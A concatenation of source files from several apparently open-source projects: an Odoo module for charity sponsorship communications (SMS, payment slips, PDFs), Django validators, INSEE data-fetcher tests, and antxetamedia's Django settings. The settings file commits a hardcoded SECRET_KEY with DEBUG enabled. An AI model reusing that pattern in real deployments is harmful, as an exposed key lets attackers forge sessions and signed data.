    Attach the yearly tax receipt, only for digital communications.

    The year defaults to the previous civil year and can be overridden
    through the ``year`` context key.
    :return: dict {attachment_name: [report_name, pdf_data]} or {}
    """
    self.ensure_one()
    if self.send_mode != 'digital':
        return {}
    report_name = 'report_compassion.tax_receipt'
    report_data = {
        'doc_ids': self.partner_id.ids,
        'year': self.env.context.get('year', date.today().year - 1),
        'lang': self.partner_id.lang,
    }
    pdf_data = self.env['report'].with_context(
        must_skip_send_to_printer=True).get_pdf(
        self.partner_id.ids, report_name, data=report_data)
    return {
        _('tax receipt.pdf'): [
            report_name,
            base64.b64encode(pdf_data)
        ]
    }
@api.multi
def send(self):
    """
    - Prevent sending communication when invoices are being reconciled
    - Mark B2S correspondence as read when printed.
    - Postpone no money holds when reminders sent.
    - Update donor tag
    - Sends SMS for sms send_mode
    :return: True
    """
    # SMS jobs are sent through their own channel.
    sms_jobs = self.filtered(lambda j: j.send_mode == 'sms')
    sms_jobs.send_by_sms()
    other_jobs = self - sms_jobs
    # Wait (max 5 retries of 5 seconds) while a reconcile queue job
    # touching this partner's invoices is still running.
    for job in other_jobs.filtered(lambda j: j.model in (
            'recurring.contract', 'account.invoice')):
        queue_job = self.env['queue.job'].search([
            ('channel', '=', 'root.group_reconcile'),
            ('state', '!=', 'done'),
        ], limit=1)
        if queue_job:
            invoices = self.env['account.invoice'].browse(
                queue_job.record_ids)
            if job.partner_id in invoices.mapped('partner_id'):
                retry = 0
                state = queue_job.state
                while state != 'done' and retry < 5:
                    if queue_job.state == 'failed':
                        raise UserError(_(
                            "A reconcile job has failed. Please call "
                            "an admin for help."
                        ))
                    _logger.info("Reconcile job is processing! Going in "
                                 "sleep for five seconds...")
                    time.sleep(5)
                    # Re-read the state each retry; presumably a plain
                    # `queue_job.state` access could serve a stale
                    # cached value — TODO confirm.
                    state = queue_job.read(['state'])[0]['state']
                    retry += 1
                if queue_job.state != 'done':
                    raise UserError(_(
                        "Some invoices of the partner are just being "
                        "reconciled now. Please wait the process to finish"
                        " before printing the communication."
                    ))
    super(PartnerCommunication, other_jobs).send()
    # Mark B2S letters as delivered once physically printed.
    b2s_printed = other_jobs.filtered(
        lambda c: c.config_id.model == 'correspondence' and
        c.send_mode == 'physical' and c.state == 'done')
    if b2s_printed:
        letters = b2s_printed.get_objects()
        if letters:
            letters.write({
                'letter_delivered': True,
            })
    # No money extension: each reminder pushes back the expiration of
    # the children holds to leave the partner time to pay.
    no_money_1 = self.env.ref('partner_communication_switzerland.'
                              'sponsorship_waiting_reminder_1')
    no_money_2 = self.env.ref('partner_communication_switzerland.'
                              'sponsorship_waiting_reminder_2')
    no_money_3 = self.env.ref('partner_communication_switzerland.'
                              'sponsorship_waiting_reminder_3')
    settings = self.env['availability.management.settings']
    first_extension = settings.get_param('no_money_hold_duration')
    second_extension = settings.get_param('no_money_hold_extension')
    for communication in other_jobs:
        extension = False
        if communication.config_id == no_money_1:
            extension = first_extension + 7
        elif communication.config_id == no_money_2:
            extension = second_extension + 7
        elif communication.config_id == no_money_3:
            extension = 10
        if extension:
            holds = communication.get_objects().mapped('child_id.hold_id')
            for hold in holds:
                expiration = datetime.now() + relativedelta(days=extension)
                hold.expiration_date = fields.Datetime.to_string(
                    expiration)
    # Add the "donor" category to partners of invoice-line based
    # communications that don't have it yet.
    donor = self.env.ref('partner_compassion.res_partner_category_donor')
    partners = other_jobs.filtered(
        lambda j: j.config_id.model == 'account.invoice.line' and
        donor not in j.partner_id.category_id).mapped('partner_id')
    partners.write({'category_id': [(4, donor.id)]})
    return True
@api.multi
def send_by_sms(self):
    """
    Sends communication jobs with SMS 939 service.

    Only jobs with a mobile number are processed. Each job body is
    converted to plain text with shortened tracker links, sent through
    the SMS wizard, then the job is marked done with its computed cost.
    :return: list of sms_texts
    """
    link_pattern = re.compile(r'<a href="(.*)">(.*)</a>', re.DOTALL)
    sms_medium_id = self.env.ref('sms_sponsorship.utm_medium_sms').id
    sms_texts = []
    for job in self.filtered('partner_mobile'):
        sms_text = job.convert_html_for_sms(link_pattern, sms_medium_id)
        sms_texts.append(sms_text)
        sms_wizard = self.env['sms.sender.wizard'].with_context(
            partner_id=job.partner_id.id).create({
                'subject': job.subject,
                'text': sms_text,
                'sms_provider_id': job.sms_provider_id.id
            })
        sms_wizard.send_sms_partner()
        job.write({
            'state': 'done',
            'sent_date': fields.Datetime.now(),
            # Cost grows with the number of SMS segments used.
            'sms_cost': ceil(
                float(len(sms_text)) / SMS_CHAR_LIMIT) * SMS_COST
        })
    return sms_texts
def convert_html_for_sms(self, link_pattern, sms_medium_id):
    """
    Converts HTML into simple text for SMS.
    First replace links with short links using Link Tracker.
    Then clean HTML using BeautifulSoup library.
    :param link_pattern: the regex pattern for replacing links
    :param sms_medium_id: the associated utm.medium id for generated links
    :return: Clean text with short links for SMS use.
    """
    self.ensure_one()
    source_id = self.config_id.source_id.id

    def _replace_link(match):
        # body_html is HTML-escaped: unescape ampersands so the link
        # tracker receives the real URL (the previous replace('&', '&')
        # was a no-op).
        full_link = match.group(1).replace('&amp;', '&')
        short_link = self.env['link.tracker'].create({
            'url': full_link,
            'campaign_id': self.utm_campaign_id.id or self.env.ref(
                'partner_communication_switzerland.'
                'utm_campaign_communication').id,
            'medium_id': sms_medium_id,
            'source_id': source_id
        })
        return short_link.short_url

    links_converted_text = link_pattern.sub(_replace_link, self.body_html)
    soup = BeautifulSoup(links_converted_text, "lxml")
    return soup.get_text().strip()
@api.multi
def open_related(self):
    """Select a better view for invoice lines.

    Overrides the default action to use the partner-oriented invoice
    line tree view, without grouping.
    """
    action = super(PartnerCommunication, self).open_related()
    if self.config_id.model == 'account.invoice.line':
        custom_ctx = self.with_context(
            tree_view_ref='sponsorship_compassion'
                          '.view_invoice_line_partner_tree',
            group_by=False,
        ).env.context
        action['context'] = custom_ctx
    return action
def get_new_dossier_attachments(self):
    """
    Returns pdfs for the New Dossier Communication, including:
    - Sponsorship payment slips (if payment is True)
    - Small Childpack
    - Sponsorship labels (if correspondence is True)
    - Child picture
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    # OrderedDict keeps attachments in printing order.
    attachments = OrderedDict()
    report_obj = self.env['report']
    # Compare payment mode names in English whatever the user language.
    account_payment_mode_obj = self.env['account.payment.mode']\
        .with_context(lang='en_US')
    lsv_dd_modes = account_payment_mode_obj.search(
        ['|', ('name', 'like', 'Direct Debit'), ('name', 'like', 'LSV')])
    permanent_order = self.env.ref(
        'sponsorship_switzerland.payment_mode_permanent_order')
    sponsorships = self.get_objects()
    # Sponsorships included for payment slips
    # NOTE(review): `and` binds tighter than `or`, so this evaluates as
    # (payer AND permanent order) OR (not LSV/DD AND not paid). The
    # numbered comments suggest condition 1 was meant to apply to every
    # branch — confirm the intended precedence.
    bv_sponsorships = sponsorships.filtered(
        # 1. Needs to be payer
        lambda s: s.partner_id == self.partner_id and
        # 2. Permanent Order are always included
        s.payment_mode_id == permanent_order or (
            # 3. LSV/DD are never included
            s.payment_mode_id not in lsv_dd_modes and
            # 4. If already paid they are not included
            not s.period_paid)
    )
    write_sponsorships = sponsorships.filtered(
        lambda s: s.correspondent_id == self.partner_id)
    # Include all active sponsorships for Permanent Order
    bv_sponsorships |= bv_sponsorships\
        .filtered(lambda s: s.payment_mode_id == permanent_order)\
        .mapped('group_id.contract_ids').filtered(
            lambda s: s.state in ('active', 'waiting'))
    # Payment slips
    if bv_sponsorships:
        report_name = 'report_compassion.3bvr_sponsorship'
        if bv_sponsorships.mapped('payment_mode_id') == permanent_order:
            # One single slip is enough for permanent order.
            report_name = 'report_compassion.bvr_sponsorship'
        attachments.update({
            _('sponsorship payment slips.pdf'): [
                report_name,
                base64.b64encode(report_obj.get_pdf(
                    bv_sponsorships.ids, report_name,
                    data={
                        'doc_ids': bv_sponsorships.ids,
                        'background': self.send_mode != 'physical'
                    }
                ))
            ]
        })
    # Childpack if not a SUB of planned exit.
    lifecycle = sponsorships.mapped('parent_id.child_id.lifecycle_ids')
    planned_exit = lifecycle and lifecycle[0].type == 'Planned Exit'
    if not planned_exit:
        attachments.update(self.get_childpack_attachment())
    # Labels
    if write_sponsorships:
        attachments.update(self.get_label_attachment(write_sponsorships))
    # Child picture
    report_name = 'partner_communication_switzerland.child_picture'
    child_ids = sponsorships.mapped('child_id').ids
    attachments.update({
        _('child picture.pdf'): [
            report_name,
            base64.b64encode(report_obj.get_pdf(
                child_ids, report_name,
                data={'doc_ids': child_ids}
            ))
        ]
    })
    # Country information
    for field_office in self.get_objects().mapped(
            'child_id.field_office_id'):
        country_pdf = field_office.country_info_pdf
        if country_pdf:
            attachments.update({
                field_office.name + ".pdf": [
                    'partner_communication_switzerland.field_office_info',
                    country_pdf
                ]
            })
    return attachments
def get_csp_attachment(self):
    """
    Attach payment slips for CSP contracts.

    Slips are only produced when the partner is the payer and at least
    one payment group is neither paid by LSV/DD nor already paid for
    the period.
    :return: OrderedDict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    attachments = OrderedDict()
    report_obj = self.env['report']
    account_payment_mode_obj = self.env['account.payment.mode']
    csp = self.get_objects()
    # Include all active csp for Permanent Order
    if 'Permanent Order' in csp.with_context(
            lang='en_US').mapped('payment_mode_id.name'):
        csp += csp.mapped(
            'group_id.contract_ids').filtered(
                lambda s: s.state == 'active')
    is_payer = self.partner_id in csp.mapped('partner_id')
    make_payment_pdf = True
    # LSV/DD don't need a payment slip
    groups = csp.mapped('group_id')
    lsv_dd_modes = account_payment_mode_obj.search(
        ['|', ('name', 'like', 'Direct Debit'), ('name', 'like', 'LSV')])
    lsv_dd_groups = groups.filtered(
        lambda r: r.payment_mode_id in lsv_dd_modes)
    if len(lsv_dd_groups) == len(groups):
        make_payment_pdf = False
    # If partner already paid, avoid payment slip
    if len(csp.filtered('period_paid')) == len(csp):
        make_payment_pdf = False
    # Payment slips
    if is_payer and make_payment_pdf:
        report_name = 'report_compassion.3bvr_sponsorship'
        attachments.update({
            # NOTE(review): 'csv' looks like a typo for 'csp' in the
            # attachment name — confirm before renaming, translations
            # may depend on this exact key.
            _('csv payment slips.pdf'): [
                report_name,
                base64.b64encode(report_obj.get_pdf(
                    csp.ids, report_name,
                    data={
                        'doc_ids': csp.ids,
                        'background': self.send_mode != 'physical'
                    }
                ))
            ]
        })
    return attachments
def _convert_pdf(self, pdf_data):
    """
    Converts all pages of PDF in A4 format if communication is
    printed.

    Oversized pages are scaled; undersized pages are centred on a
    blank A4 page.
    :param pdf_data: binary data of original pdf (base64-encoded)
    :return: binary data of converted pdf (base64-encoded)
    """
    # E-mail attachments are left untouched.
    if self.send_mode != 'physical':
        return pdf_data
    pdf = PdfFileReader(BytesIO(base64.b64decode(pdf_data)))
    convert = PdfFileWriter()
    a4_width = 594.48
    a4_height = 844.32  # A4 units in PyPDF
    # xrange: this file targets Python 2 (old Odoo API style).
    for i in xrange(0, pdf.numPages):
        # translation coordinates
        tx = 0
        ty = 0
        page = pdf.getPage(i)
        corner = [float(x) for x in page.mediaBox.getUpperRight()]
        if corner[0] > a4_width or corner[1] > a4_height:
            # NOTE(review): max() of the two ratios can leave one
            # dimension still larger than A4; min() would guarantee the
            # page fits — confirm intent.
            page.scaleBy(max(a4_width / corner[0], a4_height / corner[1]))
        elif corner[0] < a4_width or corner[1] < a4_height:
            # Centre the undersized page on the A4 sheet.
            tx = (a4_width - corner[0]) / 2
            ty = (a4_height - corner[1]) / 2
        convert.addBlankPage(a4_width, a4_height)
        convert.getPage(i).mergeTranslatedPage(page, tx, ty)
    output_stream = BytesIO()
    convert.write(output_stream)
    output_stream.seek(0)
    return base64.b64encode(output_stream.read())
|
amcat/amcat-dashboard
|
dashboard/util/validators.py
|
from django.core.exceptions import ValidationError
from django.utils.deconstruct import deconstructible
def page_filters_validator(val):
    """
    Validate page filters: a dict mapping filter names to lists of
    strings, e.g. ``{"medium": ["print", "web"]}``.

    :raises ValidationError: when the structure does not match.
    """
    # Previously these raised the bare ValidationError class with no
    # message, which made form errors impossible to diagnose.
    if not isinstance(val, dict):
        raise ValidationError(
            "Page filters must be a dict, got {}".format(type(val).__name__))
    if not all(isinstance(v, list) for v in val.values()):
        raise ValidationError("Page filter values must be lists.")
    if not all(isinstance(v, str) for vs in val.values() for v in vs):
        raise ValidationError("Page filter list items must be strings.")
@deconstructible
class HighchartsCustomizationValidator:
    """
    Validate a dict of Highcharts customization options against a fixed
    set of allowed properties, each carrying an expected type.
    """

    def __init__(self, properties):
        # properties: mapping (or iterable of pairs) from property name
        # to a descriptor exposing a `type` attribute for isinstance checks.
        self.properties = properties

    def __call__(self, value):
        if not isinstance(value, dict):
            raise ValidationError("Root element must be a dict, got {}".format(type(value)))
        errors = []
        custom_props = dict(self.properties)
        for k, v in value.items():
            try:
                prop = custom_props[k]
            except KeyError:
                errors.append(ValidationError("Unknown property {}".format(k)))
                continue
            if not isinstance(v, prop.type):
                # Collect instead of raising immediately so all problems
                # are reported at once, consistent with the
                # unknown-property handling above (previously the first
                # type error aborted validation).
                errors.append(ValidationError(
                    "Invalid type for {}, expected {!s}, got {!s}".format(k, prop.type, type(v))))
        if errors:
            raise ValidationError(errors)
|
Widukind/dlstats
|
dlstats/tests/fetchers/test_insee.py
|
# -*- coding: utf-8 -*-
from copy import deepcopy
from datetime import datetime
import os
from pprint import pprint
from dlstats.fetchers.insee import INSEE as Fetcher
from dlstats import constants
import unittest
from unittest import mock
import httpretty
from dlstats.tests.fetchers.base import BaseFetcherTestCase
from dlstats.tests.resources import xml_samples
from dlstats.tests.base import RESOURCES_DIR as BASE_RESOURCES_DIR
RESOURCES_DIR = os.path.abspath(os.path.join(BASE_RESOURCES_DIR, "insee"))
def get_dimensions_from_dsd(self, xml_dsd=None, provider_name=None, dataset_code=None, dsd_id=None):
    """Stub for INSEE_Data._get_dimensions_from_dsd (IPI-2010-A21 tests).

    Ignores every argument and returns the fixed dimension keys with a
    minimal mapping restricted to the monthly frequency.
    """
    keys = ['FREQ', 'NATURE', 'PRODUIT']
    mapping = {key: {} for key in keys}
    mapping['FREQ'] = {'M': 'M'}
    return keys, mapping
def get_dimensions_from_dsd_CHO_AN_AGE(self, xml_dsd=None, provider_name=None, dataset_code=None, dsd_id=None):
    """Stub for INSEE_Data._get_dimensions_from_dsd (CHO-AN-AGE tests).

    Ignores every argument and returns the fixed dimension keys with a
    minimal mapping restricted to the 'Nbre' indicator.
    """
    keys = ['INDICATEUR', 'SEXE', 'AGE']
    mapping = {key: {} for key in keys}
    mapping['INDICATEUR'] = {'Nbre': 'Nbre'}
    return keys, mapping
# Dataset-specific expectations merged over the generic INSEE fixture
# (xml_samples.DATA_INSEE_SPECIFIC) before assertions are run — see
# test_build_data_tree / test_upsert_dataset_ipi_2010_a21.
LOCAL_DATASETS_UPDATE = {
    "IPI-2010-A21": {
        # Category codes expected at the root of the provider data tree.
        "categories_root": ['COMPTA-NAT', 'CONDITIONS-VIE-SOCIETE', 'DEMO-ENT',
                           'ECHANGES-EXT', 'ENQ-CONJ', 'MARCHE-TRAVAIL',
                           'POPULATION', 'PRIX', 'PRODUCTION-ENT',
                           'SALAIRES-REVENUS', 'SERVICES-TOURISME-TRANSPORT',
                           'SRGDP'],
        "concept_keys": ['base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'last-update', 'nature', 'obs-status', 'produit', 'ref-area', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
        "codelist_keys": ['base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'last-update', 'nature', 'obs-status', 'produit', 'ref-area', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
        # Number of codes per codelist (0 = free-text concept).
        "codelist_count": {
            "base-per": 0,
            "decimals": 0,
            "embargo-time": 0,
            "freq": 7,
            "idbank": 0,
            "last-update": 0,
            "nature": 25,
            "obs-status": 10,
            "produit": 30,
            "ref-area": 11,
            "time-per-collect": 7,
            "title": 0,
            "unit-measure": 123,
            "unit-mult": 0,
        },
        "dimension_keys": ['freq', 'produit', 'nature'],
        "dimension_count": {
            "freq": 7,
            "produit": 30,
            "nature": 25,
        },
        "attribute_keys": ['idbank', 'title', 'last-update', 'unit-measure', 'unit-mult', 'ref-area', 'decimals', 'base-per', 'time-per-collect', 'obs-status', 'embargo-time'],
        "attribute_count": {
            "idbank": 0,
            "title": 0,
            "last-update": 0,
            "unit-measure": 123,
            "unit-mult": 0,
            "ref-area": 11,
            "decimals": 0,
            "base-per": 0,
            "time-per-collect": 7,
            "obs-status": 10,
            "embargo-time": 0,
        },
    },
}
# DSD (datastructure) fixture for the CHO-AN-AGE dataset (ILO
# unemployment, annual average, by gender and age). Based on the
# generic INSEE sample filepaths with its own dimensions/codelists.
DSD_INSEE_CHO_AN_AGE = {
    "provider": "INSEE",
    "filepaths": deepcopy(xml_samples.DATA_INSEE_SPECIFIC["DSD"]["filepaths"]),
    "dataset_code": "CHO-AN-AGE",
    "dataset_name": "Unemployment according to the ILO standard (annual average) - By gender and age",
    "dsd_id": "CHO-AN-AGE",
    "dsd_ids": ["CHO-AN-AGE"],
    "dataflow_keys": ['CHO-AN-AGE'],
    "is_completed": True,
    "concept_keys": ['age', 'base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'indicateur', 'last-update', 'obs-status', 'ref-area', 'sexe', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
    "codelist_keys": ['age', 'base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'indicateur', 'last-update', 'obs-status', 'ref-area', 'sexe', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
    # Number of codes per codelist (0 = free-text concept).
    "codelist_count": {
        "age": 73,
        "base-per": 0,
        "decimals": 0,
        "embargo-time": 0,
        "freq": 7,
        "idbank": 0,
        "indicateur": 9,
        "last-update": 0,
        "obs-status": 10,
        "ref-area": 11,
        "sexe": 3,
        "time-per-collect": 7,
        "title": 0,
        "unit-measure": 123,
        "unit-mult": 0,
    },
    "dimension_keys": ['indicateur', 'sexe', 'age'],
    "dimension_count": {
        "indicateur": 9,
        "sexe": 3,
        "age": 73,
    },
    "attribute_keys": ['freq', 'idbank', 'title', 'last-update', 'unit-measure', 'unit-mult', 'ref-area', 'decimals', 'base-per', 'time-per-collect', 'obs-status', 'embargo-time'],
    "attribute_count": {
        "freq": 7,
        "idbank": 0,
        "title": 0,
        "last-update": 0,
        "unit-measure": 123,
        "unit-mult": 0,
        "ref-area": 11,
        "decimals": 0,
        "base-per": 0,
        "time-per-collect": 7,
        "obs-status": 10,
        "embargo-time": 0,
    },
}
# Point the datastructure endpoint to the dataset-specific XML fixture.
DSD_INSEE_CHO_AN_AGE["filepaths"]["datastructure"] = os.path.abspath(os.path.join(RESOURCES_DIR, "insee-datastructure-CHO-AN-AGE.xml"))

# Full data fixture: XML file, parser class, and expected series
# statistics/sample checked by BaseFetcherTestCase.assertSeries.
DATA_INSEE_CHO_AN_AGE = {
    "filepath": os.path.abspath(os.path.join(RESOURCES_DIR, "insee-data-CHO-AN-AGE.xml")),
    "klass": "XMLSpecificData_2_1_INSEE",
    "DSD": DSD_INSEE_CHO_AN_AGE,
    "kwargs": {
        "provider_name": "INSEE",
        "dataset_code": "CHO-AN-AGE",
        "dsd_filepath": DSD_INSEE_CHO_AN_AGE["filepaths"]["datastructure"],
    },
    # Expected parse counts over the fixture file.
    "series_accept": 31,
    "series_reject_frequency": 0,
    "series_reject_empty": 0,
    "series_all_values": 1219,
    "series_key_first": '001664976',
    "series_key_last": '001665006',
    # Fully-checked sample: first series of the file.
    "series_sample": {
        "provider_name": "INSEE",
        "dataset_code": "CHO-AN-AGE",
        'key': '001664976',
        'name': 'Number - Men - From 15 to 24 years old',
        'frequency': 'A',
        'last_update': None,
        'first_value': {
            'value': '143',
            'period': '1975',
            'attributes': {
                "OBS_STATUS": "A"
            },
        },
        'last_value': {
            'value': '359',
            'period': '2014',
            'attributes': {
                "OBS_STATUS": "A"
            },
        },
        'dimensions': {
            'INDICATEUR': 'Nbre',
            'SEXE': '1',
            'AGE': '15-24',
        },
        'attributes': {
            'DECIMALS': '0',
            'FREQ': 'A',
            'LAST_UPDATE': '2016-02-10',
            'REF_AREA': 'FM',
            'TIME_PER_COLLECT': 'MOYENNE',
            'TITLE': 'Nombre de chômeurs au sens du BIT (moyenne annuelle) - Hommes de 15 à 24 ans - France métropolitaine',
            'UNIT_MEASURE': 'IND',
            'UNIT_MULT': '3'
        },
    }
}
class FetcherTestCase(BaseFetcherTestCase):
    """Tests for the INSEE fetcher, driven entirely by local XML
    fixtures registered on httpretty (no network access)."""
    # nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase

    FETCHER_KLASS = Fetcher
    # Dataset fixtures exercised by this test case.
    DATASETS = {
        'IPI-2010-A21': deepcopy(xml_samples.DATA_INSEE_SPECIFIC),
        'CHO-AN-AGE': DATA_INSEE_CHO_AN_AGE
    }
    # Alphabetically first/last dataset codes expected in the data tree.
    DATASET_FIRST = "ACT-TRIM-ANC"
    DATASET_LAST = "TXEMP-AN-FR"
    DEBUG_MODE = False

    def _load_files(self, dataset_code, data_key=None):
        """Register every SDMX endpoint on httpretty so the fetcher
        reads the local fixtures.

        :param data_key: SDMX series key filter; when given, the data
            endpoint for this dataset is registered too.
        """
        filepaths = self.DATASETS[dataset_code]["DSD"]["filepaths"]
        dsd_content_type = 'application/vnd.sdmx.structure+xml;version=2.1'

        url = "http://www.bdm.insee.fr/series/sdmx/dataflow/INSEE"
        self.register_url(url,
                          filepaths["dataflow"],
                          content_type=dsd_content_type,
                          match_querystring=True)

        url = "http://www.bdm.insee.fr/series/sdmx/categoryscheme/INSEE"
        self.register_url(url,
                          filepaths["categoryscheme"],
                          content_type=dsd_content_type,
                          match_querystring=True)

        url = "http://www.bdm.insee.fr/series/sdmx/categorisation/INSEE"
        self.register_url(url,
                          filepaths["categorisation"],
                          content_type=dsd_content_type,
                          match_querystring=True)

        url = "http://www.bdm.insee.fr/series/sdmx/conceptscheme/INSEE"
        self.register_url(url,
                          filepaths["conceptscheme"],
                          content_type=dsd_content_type,
                          match_querystring=True)

        # Shared codelists used by every INSEE dataset.
        for cl in ["CL_UNIT", "CL_AREA", "CL_TIME_COLLECT", "CL_OBS_STATUS", "CL_UNIT_MULT", "CL_FREQ"]:
            url = "http://www.bdm.insee.fr/series/sdmx/codelist/INSEE/%s" % cl
            self.register_url(url,
                              filepaths[cl],
                              content_type=dsd_content_type,
                              match_querystring=True)

        url = "http://www.bdm.insee.fr/series/sdmx/datastructure/INSEE/%s?reference=children" % dataset_code
        self.register_url(url,
                          filepaths["datastructure"],
                          content_type=dsd_content_type,
                          match_querystring=True)

        if data_key:
            url = "http://www.bdm.insee.fr/series/sdmx/data/%s/%s" % (dataset_code, data_key)
            self.register_url(url,
                              self.DATASETS[dataset_code]['filepath'],
                              content_type='application/vnd.sdmx.structurespecificdata+xml;version=2.1',
                              match_querystring=True)

    @httpretty.activate
    @unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
    def test_load_datasets_first(self):
        dataset_code = 'IPI-2010-A21'
        self._load_files(dataset_code)
        self.assertLoadDatasetsFirst([dataset_code])

    @httpretty.activate
    @unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
    def test_load_datasets_update(self):
        dataset_code = 'IPI-2010-A21'
        self._load_files(dataset_code)
        self.assertLoadDatasetsUpdate([dataset_code])

    @httpretty.activate
    def test_build_data_tree(self):
        # nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_build_data_tree
        dataset_code = 'IPI-2010-A21'
        self._load_files(dataset_code)
        self.DATASETS[dataset_code]["DSD"].update(LOCAL_DATASETS_UPDATE[dataset_code])
        self.assertDataTree(dataset_code)

    @httpretty.activate
    @mock.patch('dlstats.fetchers.insee.INSEE_Data._get_dimensions_from_dsd', get_dimensions_from_dsd)
    def test_upsert_dataset_ipi_2010_a21(self):
        # nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_upsert_dataset_ipi_2010_a21
        dataset_code = 'IPI-2010-A21'
        self.DATASETS[dataset_code]["DSD"].update(LOCAL_DATASETS_UPDATE[dataset_code])
        # IDBANK is not exposed by this dataset's fixture.
        self.DATASETS[dataset_code]["series_sample"]["attributes"].pop("IDBANK", None)
        self._load_files(dataset_code, data_key="M..")
        self.assertProvider()
        dataset = self.assertDataset(dataset_code)
        series_list = self.assertSeries(dataset_code)
        self.assertTrue(dataset["last_update"] >= datetime(2016, 1, 8))
        self.assertEquals(series_list[0]["last_update_ds"], datetime(2016, 1, 8))
        self.assertEquals(series_list[-1]["last_update_ds"], datetime(2013, 3, 11))

    @httpretty.activate
    @mock.patch('dlstats.fetchers.insee.INSEE_Data._get_dimensions_from_dsd', get_dimensions_from_dsd_CHO_AN_AGE)
    def test_upsert_dataset_cho_an_age(self):
        # nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_upsert_dataset_cho_an_age
        dataset_code = 'CHO-AN-AGE'
        self._load_files(dataset_code, data_key="Nbre..")
        self.assertProvider()
        dataset = self.assertDataset(dataset_code)
        series_list = self.assertSeries(dataset_code)
        self.assertTrue(dataset["last_update"] >= datetime(2016, 2, 10))
        self.assertEquals(series_list[0]["last_update_ds"], datetime(2016, 2, 10))
        self.assertEquals(series_list[-1]["last_update_ds"], datetime(2016, 2, 12))

    @httpretty.activate
    @unittest.skipIf(True, "TODO")
    def test_is_updated(self):
        # nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_is_updated
        # NOTE(review): relies on self.insee / self.db which are not
        # defined in this class — test is disabled (skipIf TODO above).
        """
        use dataset.series.now
        """
        dataset_code = 'IPI-2010-A21'

        self._load_files(dataset_code)
        self.insee.upsert_dataset(dataset_code)

        '''series avec un LAST_UPDATE > au dataset'''
        query = {
            'provider_name': self.insee.provider_name,
            "dataset_code": dataset_code
        }
        new_datetime = datetime(2015, 12, 9)
        result = self.db[constants.COL_DATASETS].update_one(query, {"$set": {'last_update': new_datetime}})
        pprint(result.raw_result)

        self._load_files(dataset_code)
        self.insee.upsert_dataset(dataset_code)
        _series = self.insee.insee_data._series
        #pprint(_series)
        for s in _series:
            print(s['key'])

        d = self.db[constants.COL_DATASETS].find_one(query)
        print("dataset : ", d['last_update'])

        self.assertEqual(len(_series), 11)
|
GISAElkartea/amv2
|
antxetamedia/settings.py
|
# Django settings for the antxetamedia project.
import os

# Project root (two levels above this settings module).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository — rotate it and
# load it from the environment for any production deployment.
SECRET_KEY = 'd2w#o#(!antcw5e%(#p5*pu(x=zhw60^byh$)ps+4#e8m#-fj!'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = TEMPLATE_DEBUG = True

ALLOWED_HOSTS = []

INSTALLED_APPS = [
    # Django contrib apps
    'django.contrib.sites',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Grappelli must precede django.contrib.admin to override its UI.
    'grappelli.dashboard',
    'grappelli',
    'django.contrib.admin',
    # Third-party apps
    'adminsortable2',
    'ckeditor',
    'ckeditor_uploader',
    'compressor',
    'recurrence',
    'kombu.transport.django',
    'watson',
    'sorl.thumbnail',
    'django_filters',
    # Project apps
    'antxetamedia',
    'antxetamedia.frontpage',
    'antxetamedia.blobs.apps.BlobsConfig',
    'antxetamedia.shows',
    'antxetamedia.news.apps.NewsConfig',
    'antxetamedia.radio.apps.RadioConfig',
    'antxetamedia.projects.apps.ProjectsConfig',
    'antxetamedia.schedule',
    'antxetamedia.widgets',
    'antxetamedia.events.apps.EventsConfig',
    'antxetamedia.flatpages',
    'antxetamedia.archive',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

SITE_ID = 3

ROOT_URLCONF = 'antxetamedia.urls'

TEMPLATES = [
    {
        'NAME': 'Only project',
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join('antxetamedia/templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'debug': DEBUG,
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                # Injects the flatpage menu into every template context.
                'antxetamedia.flatpages.context_processors.menu_flatpage_list',
            ],
        },
    },
]

WSGI_APPLICATION = 'antxetamedia.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'eu'
LANGUAGES = [('eu', 'Euskara')]
TIME_ZONE = 'Europe/Paris'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOCALE_PATHS = [os.path.join(BASE_DIR, 'antxetamedia/locale')]

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_ROOT = os.path.join(BASE_DIR, '.media')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, '.assets')
